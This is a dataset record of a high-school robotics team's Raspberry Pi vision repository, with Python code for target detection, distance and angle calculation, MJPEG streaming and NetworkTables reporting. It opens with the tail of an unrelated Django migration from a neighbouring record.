"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 15:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0004_os'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Environment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=30, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ],\n options={\n 'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n 'verbose_name_plural': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n },\n ),\n migrations.AlterModelOptions(\n name='os',\n options={'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf', 'verbose_name_plural': '\\u64cd\\u4f5c\\u7cfb\\u7edf'},\n ),\n ]\n"
}
] | 64 |
1777TheVikings/Pi2017 | https://github.com/1777TheVikings/Pi2017 | 82a63be33a007e25fcf662875afbcac096505c79 | 7f986eed645a3fa7936f5443f428c2ffad577c2f | e1f46e716fc2715563b47fa9e2673a21340adcab | refs/heads/main | 2021-09-04T12:51:14.720412 | 2018-01-18T21:57:48 | 2018-01-18T21:57:48 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6618704795837402,
"alphanum_fraction": 0.6744604110717773,
"avg_line_length": 19.592592239379883,
"blob_id": "c5cb8dfadf51b0b363c4e18e3edbde6323a1bcde",
"content_id": "9899382ffaa2b85a33b2781695379cc53293f02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 27,
"path": "/src/vision_utils/stream_webcam_test.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# import numpy as np\nimport vision_utils\nimport cv2\nimport threading\n\nstop = False\n\nserver_mjpg = vision_utils.MJPG(None, threading.Lock())\nserver = vision_utils.MJPGserver(server_mjpg)\n\n# noinspection PyArgumentList\ncap = cv2.VideoCapture(0)\nrval, _ = cap.read()\n\nserver.start()\n\ntry:\n while rval:\n rval, frame = cap.read()\n\n frame = cv2.flip(frame, 1)\n\n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\nexcept KeyboardInterrupt:\n server.stop()\n"
},
{
"alpha_fraction": 0.5978552103042603,
"alphanum_fraction": 0.6764968633651733,
"avg_line_length": 30.08333396911621,
"blob_id": "76d96d5bc73fe2e8849da99be4c08720af59e84a",
"content_id": "878c027a0a8bdff7974a54f2df78c918bd94de5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 36,
"path": "/src/vision_utils/stream_screen_test.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from PIL import ImageGrab\nimport numpy as np\nimport vision_utils\nimport cv2\nimport threading\n\nstop = False\n\nserver_mjpg = vision_utils.MJPG(None, threading.Lock())\nserver = vision_utils.MJPGserver(server_mjpg)\n\n# noinspection PyArgumentList\ncap = cv2.VideoCapture(0)\nrval, _ = cap.read()\n\nserver.start()\n\nx_offset = 1366 - 320 - 25\ny_offset = 786 - 180 - 25\n\nwhile rval:\n rval, frame_webcam = cap.read() # 720x1280 for MacBook webcam\n frame_webcam = cv2.resize(frame_webcam, (0, 0), fx=0.25, fy=0.25) # 180x320 after resize\n\n frame = np.array(ImageGrab.grab(bbox=(0, 0, 1365, 785))) # 1366x786 for MacBook display\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n cv2.putText(frame, \"Viewer Count: \" + str(vision_utils.VIEWER_COUNT), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 2,\n (255, 255, 255))\n frame[y_offset:y_offset + frame_webcam.shape[0], x_offset:x_offset + frame_webcam.shape[1]] = frame_webcam\n\n frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n\n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n"
},
{
"alpha_fraction": 0.7796609997749329,
"alphanum_fraction": 0.7796609997749329,
"avg_line_length": 58,
"blob_id": "32ff271274744750a6163b9564c534a2e0c01eff",
"content_id": "fe9932fbc0a40584fcfdd967e3c30105c3451562",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/src/README.txt",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "led_thread.py does not work and will lock up the terminal.\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 26,
"blob_id": "c149cd1270a332d7bea23bf23f807a401c63abad",
"content_id": "6bc6eaeaec1ddfcaf1e103d082792e7024183177",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/src/vision_utils/__init__.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from vision_utils import *\nfrom benchmarking import *\nfrom contour_info import *"
},
{
"alpha_fraction": 0.7543859481811523,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 113,
"blob_id": "9d2ba561e6ae936a430e21e8b4c3ddb9e5a58f45",
"content_id": "1143c64437e52127bf4e8066a7ed744c7dcc599d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 1,
"path": "/rec/README.txt",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "In order to save space, 'last.mp4' is overwritten for each recording. If you want to save a recording, rename it.\n"
},
{
"alpha_fraction": 0.5806655883789062,
"alphanum_fraction": 0.58795565366745,
"avg_line_length": 27.423423767089844,
"blob_id": "8344beda66b797918761a54b623db585862819a9",
"content_id": "b9768fe59ba278492659b6644e899a174e03425a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3155,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 111,
"path": "/src/vision_utils/vision_utils.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from bottle import get, response, ServerAdapter\nfrom bottle import run as run_server\nimport threading\n\n\nBOUNDARY = \"okthxbby\"\nCRLF = \"\\r\\n\"\nFRAME_MJPG = None\nVIEWER_COUNT = 0\nALL_STREAMS = []\nSTOP_STREAMS = False\n\n\nclass MJPG(object):\n def __init__(self, frame, lock):\n self.frame = frame\n self.lock = lock\n\n\nclass MJPGstream(object):\n def __init__(self, frame_mjpg, width, height):\n global VIEWER_COUNT\n self.frame_mjpg = frame_mjpg\n self.stream_width = width\n self.stream_height = height\n VIEWER_COUNT += 1\n\n def __iter__(self):\n global ALL_STREAMS\n ALL_STREAMS.append(self)\n return self\n\n def next(self):\n if STOP_STREAMS:\n raise StopIteration\n self.frame_mjpg.lock.acquire()\n data = self.frame_mjpg.frame\n self.frame_mjpg.lock.release()\n\n # Add the frame boundary to the output\n out = \"--\" + BOUNDARY + CRLF\n\n # Add the jpg frame header\n out += \"Content-type: image/jpeg\" + CRLF\n\n # Add the frame content length\n out += \"Content-length: \" + str(len(data)) + CRLF + CRLF\n\n # Add the actual binary jpeg frame data\n return out + data\n\n def stop(self):\n global VIEWER_COUNT\n global ALL_STREAMS\n VIEWER_COUNT -= 1\n ALL_STREAMS.remove(self)\n\n def send_frame(self, frame):\n frame_width, frame_height, _ = frame.shape\n stream_frame = cv2.resize(frame,\n None,\n fx=frame_width / stream_width,\n fy=frame_height / stream_height,\n interpolation=cv2.INTER_CUBIC)\n \n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n\n\n# found at https://stackoverflow.com/questions/11282218/bottle-web-framework-how-to-stop\nclass WSGIRefServerStoppable(ServerAdapter):\n server = None\n\n def run(self, handler):\n from wsgiref.simple_server import make_server, WSGIRequestHandler\n if self.quiet:\n class QuietHandler(WSGIRequestHandler):\n def log_request(*args, **kw): pass\n self.options['handler_class'] = QuietHandler\n self.server = make_server(self.host, self.port, handler, **self.options)\n self.server.serve_forever()\n\n def stop(self):\n STOP_STREAMS = True\n self.server.shutdown()\n\n\nclass MJPGserver(threading.Thread):\n def __init__(self, frame_mjpg):\n global FRAME_MJPG\n super(MJPGserver, self).__init__()\n FRAME_MJPG = frame_mjpg\n self.server = WSGIRefServerStoppable(host=\"0.0.0.0\", port=8080)\n\n def run(self):\n run_server(server=self.server, debug=True)\n\n def stop(self):\n self.server.stop()\n\n @staticmethod\n @get(\"/\")\n def index():\n return '<html><body><img src=\"/mjpeg\" /></body></html>'\n\n @staticmethod\n @get(\"/mjpg\")\n def mjpeg():\n response.content_type = \"multipart/x-mixed-replace;boundary=\" + BOUNDARY\n return iter(MJPGstream(FRAME_MJPG))\n"
},
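A minimal client-side sketch of how the multipart stream served by vision_utils.py above can be consumed (Python 2, matching the repo). Only the /mjpeg route, port 8080, and the multipart framing come from the module; the JPEG byte markers and the output filename are illustrative assumptions.

import urllib2

stream = urllib2.urlopen("http://localhost:8080/mjpeg")  # MJPGserver default host/port
buf = ""
while True:
    buf += stream.read(1024)
    start = buf.find("\xff\xd8")  # JPEG start-of-image marker
    end = buf.find("\xff\xd9")    # JPEG end-of-image marker
    if start != -1 and end != -1 and end > start:
        with open("frame.jpg", "wb") as f:  # hypothetical output path
            f.write(buf[start:end + 2])     # keep the first complete frame
        break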
{
"alpha_fraction": 0.7119565010070801,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 29.66666603088379,
"blob_id": "00ad765084aa54c33bb071e1c693c845e59e1943",
"content_id": "4a289e50f52fc388757c9f432eea78901c93e9a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 6,
"path": "/utils/usb_transfer.sh",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "mount /dev/sda1/ /media/usb\n\ncp /media/usb/vision_files/pipeline.py /home/pi/Pi2017/src/pipeline.py\ncp /home/pi/Pi2017/rec/last.avi /media/usb/vision_files/last.avi\n\numount /media/usb\n"
},
{
"alpha_fraction": 0.7541666626930237,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 47,
"blob_id": "155f6233bbfcc397499a41058c1d9cfd1a0e04fa",
"content_id": "d693d7324437537014c0a6fd475b5e4ddb9a265b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 5,
"path": "/README.md",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# FRC Team 1777 Co-Processing Code\n\n`src/main.py` is the actual program that should be used in competition.\n\n`src/test_with_images.py` is intended for testing when props are not available. Images for this are pulled from `img/test_images/`\n"
},
{
"alpha_fraction": 0.5379665493965149,
"alphanum_fraction": 0.5469755530357361,
"avg_line_length": 31.759037017822266,
"blob_id": "d996a8266da637df420b7f292227d782d33b6495",
"content_id": "f4ae09222813e79c42f45d599d213c2f0f448e3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5439,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 166,
"path": "/src/main.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from math import sqrt\nfrom networktables import NetworkTables\nfrom constants import *\nimport vision_utils\nimport cv2\nimport os\nimport pipeline\nimport numpy\nimport sys\nimport threading\nimport time\n\n\nframe = None\nrval = None\n\n\n# load Pi Camera drivers\nos.system(\"sudo modprobe bcm2835-v4l2 #\")\n\n\npl = pipeline.GripPipeline()\n\n\ndef led_on():\n os.system(\"sudo echo 1 > /sys/class/leds/led0/brightness\")\n\n\ndef led_off():\n os.system(\"sudo echo 0 > /sys/class/leds/led0/brightness\")\n\n\nif __name__ == \"__main__\":\n try:\n if \"-t\" in sys.argv[1:]:\n TEST_OUTPUT = True\n if \"-s\" in sys.argv[1:]:\n STREAM_VIDEO = True\n if \"--no-led\" in sys.argv[1:]:\n LED_STATUS = False\n if \"--no-rec\" in sys.argv[1:]:\n RECORD_STREAM = False\n except IndexError:\n pass\n \n if LED_STATUS:\n # prepare status LED for use by disabling normal behavior\n print \"[INFO] Disabling normal status LED behavior\"\n os.system(\"sudo echo none > /sys/class/leds/led0/trigger\")\n led_off()\n \n if not TEST_OUTPUT:\n print \"[INFO] Connecting to NetworkTables\"\n NetworkTables.initialize(server=\"roboRIO-1777-FRC.local\")\n sd = NetworkTables.getTable(\"SmartDashboard\")\n \n print \"[INFO] Calculating focal length from test image\"\n calibImg = cv2.imread(CALIB_IMG_PATH)\n if calibImg is None:\n print \"[ERROR] Calibration imaage not found: \" + CALIB_IMG_PATH\n exit()\n pl.process(calibImg)\n try:\n cnt = [pl.convex_hulls_output[0], pl.convex_hulls_output[1]]\n except IndexError:\n print \"[ERROR] Calibration failed; did not find two convex hulls\"\n exit()\n focal_length = vision_utils.calculate_focal_length(cnt)\n print \"[INFO] Calibration success; focal_length = \" + str(focal_length) \n \n \n cam = cv2.VideoCapture(0)\n print \"[INFO] Attempting video capture start\"\n \n if cam.isOpened():\n rval, _ = cam.read()\n if rval:\n print \"[INFO] rval test success\"\n else:\n print \"[ERROR] rval test fail\"\n exit()\n else:\n print \"[ERROR] Video capture could not be opened\"\n \n if not TEST_OUTPUT:\n if not sd.isConnected():\n print \"[INFO] Waiting for NetworkTables connection...\"\n while not sd.isConnected():\n pass\n print \"[INFO] NetworkTables ready\"\n \n if LED_STATUS:\n led_on()\n \n if STREAM_VIDEO:\n stream_width = 480\n stream_height = 640\n print \"[INFO] Starting video stream...\"\n server_mjpg = vision_utils.MJPG(None, threading.Lock())\n server = vision_utils.MJPGserver(server_mjpg)\n server.start()\n \n if RECORD_STREAM:\n print \"[INFO] Starting recording\"\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter('last.avi', fourcc, 30.0, (640, 480))\n \n print \"[INFO] Starting detection\"\n \n frame_num = 1\n try:\n while rval:\n vision_utils.start_time(\"reading\")\n rval, frame = cam.read()\n vision_utils.end_time(\"reading\")\n \n vision_utils.start_time(\"processing.grip\")\n pl.process(frame)\n vision_utils.end_time(\"processing.grip\")\n vision_utils.start_time(\"processing.matcher\")\n # pl.process does not return the end image; instead, results are\n # stored in the pipeline object (e.g. 
pl.find_contours_output)\n pl_out = pl.convex_hulls_output\n if len(pl_out) > 1:\n contour_info = vision_utils.ContourInfo(pl_out, focal_length)\n if TEST_OUTPUT:\n print \"angle = \" + str(contour_info.angle) + \\\n \"; distance = \" + str(contour_info.dist_away) + \\\n \"; frame = \" + str(frame_num)\n else:\n sd.putNumber('pi_angle', contour_info.angle)\n sd.putNumber('pi_distance', contour_info.dist_away)\n sd.putNumber('pi_frame', frame_num)\n frame_num += 1\n vision_utils.end_time(\"processing.matcher\")\n \n if STREAM_VIDEO:\n vision_utils.start_time(\"resize+encode\")\n frame_width, frame_height, _ = frame.shape\n stream_frame = cv2.resize(frame,\n None,\n fx=frame_width / stream_width,\n fy=frame_height / stream_height,\n interpolation=cv2.INTER_CUBIC)\n \n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n vision_utils.end_time(\"resize+encode\")\n \n if RECORD_STREAM:\n vision_utils.start_time(\"recording\")\n out.write(frame)\n vision_utils.end_time(\"recording\")\n \n \n except KeyboardInterrupt:\n print \"\\n[INFO] Received KeyboardInterrupt; exiting\"\n vision_utils.report()\n finally:\n print \"[INFO] Releasing video capture\"\n cam.release()\n out.release()\n if STREAM_VIDEO:\n print \"[INFO] Shutting off video stream\"\n server.stop()\n\n"
},
{
"alpha_fraction": 0.7337807416915894,
"alphanum_fraction": 0.7527964115142822,
"avg_line_length": 41.619049072265625,
"blob_id": "cf07456e26466d2da59fd701beb7bd31da0acc6e",
"content_id": "b9fd9889019bcccb43d5f15ef469b13676ef2512",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/src/constants.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# if true, outputs to console instead of NetworkTables\n# set this using \"-t\" instead of manually setting this\nTEST_OUTPUT = False\n# if true, use status (SD card usage) LED to indicate status\n# diable using \"--no-led\" instead of manually setting this\nLED_STATUS = True\n# if true, create an MJPG stream to be used by SmartDashboard\n# set this using \"-s\" instead of manually setting this\nSTREAM_VIDEO = False\n# If true, record a video of the stream sent to the driver\n# station. Disable using \"--no-rec\" instaed of manually\n# setting this. See the readme in ../rec for more info.\nRECORD_STREAM = True\n# absolute path to a calibration image\nCALIB_IMG_PATH = \"/home/pi/Pi2017/img/3feet.jpg\"\n# distance between strips, in inches\nDIST_BETWEEN_STRIPS = 8.5\n# distance between camera peg in the calibration image, in inches\nCALIB_DIST = 36\n# horizontal FoV / width of video\nDEGREES_PER_PIXEL = 0.0971875"
},
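The DEGREES_PER_PIXEL constant above follows directly from its comment ("horizontal FoV / width of video"). A quick numeric check, assuming the published 62.2-degree horizontal field of view of the Pi Camera v2 and a 640 px capture width (both are assumptions about the hardware, not stated in the file):

HORIZONTAL_FOV = 62.2  # degrees; assumed Pi Camera v2 spec
FRAME_WIDTH = 640      # pixels; assumed capture width
print HORIZONTAL_FOV / FRAME_WIDTH  # 0.0971875, the value in constants.py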
{
"alpha_fraction": 0.5493106842041016,
"alphanum_fraction": 0.564687192440033,
"avg_line_length": 22.873416900634766,
"blob_id": "305eadc8d003a45a5a0a94a1eea0d7e1e148b8b3",
"content_id": "e011139e52fd4513d96af14127416bebecaf0b03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1886,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 79,
"path": "/src/led_thread.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport threading\nimport time\nimport os\n\n\ndef toggleLED(ledStatus):\n if ledStatus == \"on\":\n GPIO.output(16, GPIO.HIGH)\n return \"off\"\n elif ledStatus == \"off\":\n GPIO.output(16, GPIO.LOW)\n return \"on\"\n else:\n raise ValueError(\"ledStatus is set to an invalid value: \" + ledStatus)\n\n\ndef slowBlink(ledStatus):\n newStatus = toggleLED(ledStatus)\n time.sleep(.25)\n return newStatus\n\n\ndef fastBlink(ledStatus):\n newStatus = toggleLED(ledStatus)\n time.sleep(0.125)\n return newStatus\n\n\nfunctionStates = {\"slow\": slowBlink, \"fast\": fastBlink}\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\nGPIO.output(16, GPIO.HIGH)\n\n\nclass ledThread(threading.Thread):\n def __init__(self, threadID, name, state, ledStatus):\n super(ledThread, self).__init__()\n self.threadID = threadID\n self.name = name\n self.state = state\n self.ledStatus = ledStatus\n \n self._stop_event = threading.Event()\n \n def stop(self):\n self._stop_event.set()\n \n def stopped(self):\n return self._stop_event.is_set()\n \n def run(self):\n while 1:\n if self.stopped():\n self.state == \"finished\"\n print self.ledStatus\n if self.state == \"finished\":\n GPIO.output(16, GPIO.HIGH)\n break\n elif self.state == \"solid\":\n GPIO.output(16, GPIO.LOW)\n time.sleep(0.1)\n continue\n funcToExec = functionStates[self.state]\n self.ledStatus = funcToExec(self.ledStatus)\n\n\nif __name__ == \"__main__\":\n t1 = ledThread(1, \"LED-thread\", \"solid\", \"on\")\n t1.daemon = True\n t1.start()\n try:\n while True:\n time.sleep(0.1)\n except KeyboardInterrupt:\n print \"ok\"\n t1.stop()\n t1.join()\n"
},
{
"alpha_fraction": 0.5448383688926697,
"alphanum_fraction": 0.5724713206291199,
"avg_line_length": 33.25,
"blob_id": "007e1cf4dec9f10c095e6d1445c7d973027c1014",
"content_id": "32a0845b6986cc6c1c5dc81e6d949b6b2f44582f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 56,
"path": "/src/vision_utils/contour_info.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from math import sqrt\nfrom constants import *\nimport cv2\n\n\nclass ContourInfo(object):\n def __init__(self, contours, focal_length):\n self._contours = contours\n self._focal_length = focal_length\n self.calculate()\n\n def calculate(self):\n centers = find_center_of_contours(self._contours)\n dist_strips = sqrt( ((centers[1][0] - centers[0][0]) ** 2) + \\\n ((centers[1][1] - centers[0][1]) ** 2) )\n self.midpoint = ( ((centers[0][0] + centers[1][0]) / 2), \\\n ((centers[0][1] + centers[1][1]) / 2) )\n self.dist_away = find_distance(dist_strips, self._focal_length)\n if midpoint[0] < 320:\n self.angle = DEGREES_PER_PIXEL * (320 - midpoint[0])\n else:\n self.angle = -1 * (DEGREES_PER_PIXEL * (midpoint[0] - 320))\n\n\ndef find_center_of_contours(contours):\n \"\"\" Takes a list of contours and returns the centroid\n (center point) of each one.\n \"\"\"\n output = []\n for i in contours:\n m = cv2.moments(i)\n cx = int(m['m10']/m['m00'])\n cy = int(m['m01']/m['m00'])\n output.append((cx, cy))\n return output\n\n\ndef find_distance(dist, focal_len):\n \"\"\" Takes the distance between two strips and the focal\n length of the camera and returns the distance between\n the camera and the peg.\n \"\"\"\n return ( DIST_BETWEEN_STRIPS * focal_len ) / dist\n\n\ndef calculate_focal_length(contours):\n \"\"\" Calculates the focal length of the camera based on two\n contours located a known distance apart.\n\n Takes a list of two contours and returns a float\n indicating the focal length.\n \"\"\"\n centers = find_center_of_contours(contours)\n distance = sqrt( ((centers[1][0] - centers[0][0]) ** 2) + \\\n ((centers[1][1] - centers[0][1]) ** 2) )\n return ( distance * CALIB_DIST ) / DIST_BETWEEN_STRIPS\n"
},
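A worked numeric check of the similar-triangles math in contour_info.py above. The two constants come from constants.py; the pixel measurements are made up for illustration:

DIST_BETWEEN_STRIPS = 8.5  # inches, from constants.py
CALIB_DIST = 36            # inches, from constants.py

pixel_dist_calib = 170.0   # hypothetical strip separation seen in the calibration image
focal_length = (pixel_dist_calib * CALIB_DIST) / DIST_BETWEEN_STRIPS  # 720.0

pixel_dist_now = 85.0      # the strips now look half as far apart...
print (DIST_BETWEEN_STRIPS * focal_length) / pixel_dist_now  # 72.0 inches: twice as far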
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.6041237115859985,
"avg_line_length": 32.068180084228516,
"blob_id": "554e932b79bc45769d7b48cb1e834a26dc54f015",
"content_id": "4bbdffd93d167dff9948234145ed7ae9149a9451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 44,
"path": "/src/vision_utils/benchmarking.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import cv2\nimport collections\n\nexec_times = collections.defaultdict(lambda: [0, 0])\ntimers_in_progress = {}\n\n\ndef add_to_execution_times(type, time):\n global exec_times\n new_time_total = (exec_times[type][1] * exec_times[type][0]) + time\n exec_times[type][0] += 1\n exec_times[type][1] = new_time_total / exec_times[type][0]\n\n\ndef start_time(type):\n global timers_in_progress\n timers_in_progress[type] = cv2.getTickCount()\n\n\ndef end_time(type):\n end = cv2.getTickCount()\n add_to_execution_times(type,\n (end - timers_in_progress[type]) / cv2.getTickFrequency())\n\n\ndef report():\n total_time = 0\n for i in exec_times.values():\n total_time += i[1]\n \n top_line = \"Average time per frame: {} seconds\".format(str(total_time))\n avg_fps_line = \"Average frames per second: {} fps\".format(str(1 / total_time))\n longest_type = max({i: len(i) for i in exec_times.keys()}.values())\n remaining_len = max(len(top_line), len(avg_fps_line)) - (longest_type + 3)\n print top_line\n print avg_fps_line\n print \"=\" * len(top_line)\n for i in exec_times.keys():\n str_out = i.ljust(longest_type + 1) + \"| \"\n percent = exec_times[i][1] / total_time\n str_out += \"#\" * int(round((remaining_len - 6) * percent))\n last_len = remaining_len - int(round((remaining_len - 6) * percent))\n str_out += (\" %.1f%%\" % (percent * 100)).rjust(last_len)\n print str_out\n"
},
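A minimal usage sketch for the timers in benchmarking.py above; the section name "work" and the sleep stand-in are arbitrary:

import time
import vision_utils  # start_time/end_time/report are re-exported by the package

for _ in range(10):
    vision_utils.start_time("work")
    time.sleep(0.01)  # stand-in for per-frame processing
    vision_utils.end_time("work")

vision_utils.report()  # prints average frame time, fps, and an ASCII breakdown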
{
"alpha_fraction": 0.6442800164222717,
"alphanum_fraction": 0.6602162718772888,
"avg_line_length": 33.45098114013672,
"blob_id": "3ef10084b65dc377f7cd5728e2f1c89639f5d106",
"content_id": "b1b3c99b28fea2cb2704bfb815c1dfe35b16e343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1757,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 51,
"path": "/src_old/test_from_images.py.old",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy\nimport pipeline\nimport os\nimport sys\nfrom math import sqrt\nfrom main import *\n\n\n# ensures that the Pi Camera drivers are loaded\nos.system(\"sudo modprobe bcm2835-v4l2 #\")\n# GRIP pipeline object\npl = pipeline.GripPipeline()\n\n# list of relative image paths\nIMAGE_PATHS = [\"../img/test_images/1.jpg\", \"../img/test_images/2.jpg\", \"../img/test_images/3.jpg\"]\n# maximum vertical variance between pairs of viable keypoints\nMAX_Y_VARIANCE = 25\n# approx. distance between center of two strips of tape, in inches\nDIST_BETWEEN_STRIPS = 8.5\n# relative path to a calibration image\nCALIB_IMG_PATH = \"../img/3feet.jpg\"\n# distance between camera and peg in the calibration image, in inches\nCALIB_DIST = 36\n\nif __name__ == \"__main__\":\n print \"[INFO] Calculating focal length from test image\"\n calibImg = cv2.imread(CALIB_IMG_PATH)\n if calibImg is None:\n print \"[ERROR] Calibration image not found: \" + CALIB_IMG_PATH\n exit()\n pl.process(calibImg)\n try:\n kp = find_viable_pairs(pl.find_blobs_output)[0]\n except IndexError:\n print \"[ERROR] Calibration failed; no keypoint pairs found\"\n exit()\n focal_length = ( kp[2] * CALIB_DIST ) / DIST_BETWEEN_STRIPS\n ddMulti = kp[2] / (( kp[0].size + kp[1].size ) / 2)\n \n for img in IMAGE_PATHS:\n print \"[INFO] Processing image \" + img\n frame = cv2.imread(img)\n pl.process(frame)\n # pl.process does not return the end image; instead, results are stored in\n # the pipeline object (e.g. pl.find_blobs_output)\n output = pl.find_blobs_output\n viable_points = find_viable_pairs(output, ddMulti)\n \n for i in viable_points:\n print find_distance(i[2], focal_length), i[0].pt, i[1].pt\n"
}
] | 14 |